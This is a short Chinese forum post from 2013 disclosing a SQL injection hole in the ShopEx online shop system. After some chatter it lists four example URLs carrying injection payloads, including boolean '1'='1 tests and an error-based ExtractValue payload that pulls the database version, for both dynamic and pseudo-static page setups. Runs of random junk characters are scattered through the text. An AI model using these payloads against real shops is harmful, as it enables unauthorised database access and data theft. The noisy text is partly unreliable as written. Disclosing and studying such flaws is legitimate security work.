注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… m" L' f' e6 l/ q
, y; z+ e2 J# w4 k3 M2 M0 N
好吧,我扯远了~~4 b- H5 ]" y. ^0 r1 ]" |. c! A+ h' x# K
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
( a+ {8 v. k+ M+ _不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
- R/ ? }. w3 U4 N% t& |; _- ?, m
7 }1 w* z9 ~: C/ [http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
: o4 X+ w+ j0 F7 @8 ?2 I
/ D5 Y8 p& L3 I2 s5 r: phttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
1 @4 r/ r. h( H+ x6 T; ^5 P4 V7 z- [8 @6 n X3 ~6 x
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html 1 O, P q; {/ x6 v) R
3 H* P' s- l0 U1 ]& p8 d) J; [/ s
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html 9 ~: j3 K, w5 ?, ]
! T/ f0 s! A! X9 }9 {$ W* J 3 C! g6 d* e: M
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
9 |+ o9 j8 W% M0 _1 a9 c如何注入就不多说了,10多年的东西了…不会也会了…
: `, E0 F# r7 [# }/ q$ r9 j! w; F# p
! l2 r: A, k$ |% o [
" H3 H4 e7 g5 O5 ~4 @9 T) L
+ [6 ^+ g n& G& |0 c0 q& M* k |
发表于 2013-2-19 08:31:27
收藏
支持
反对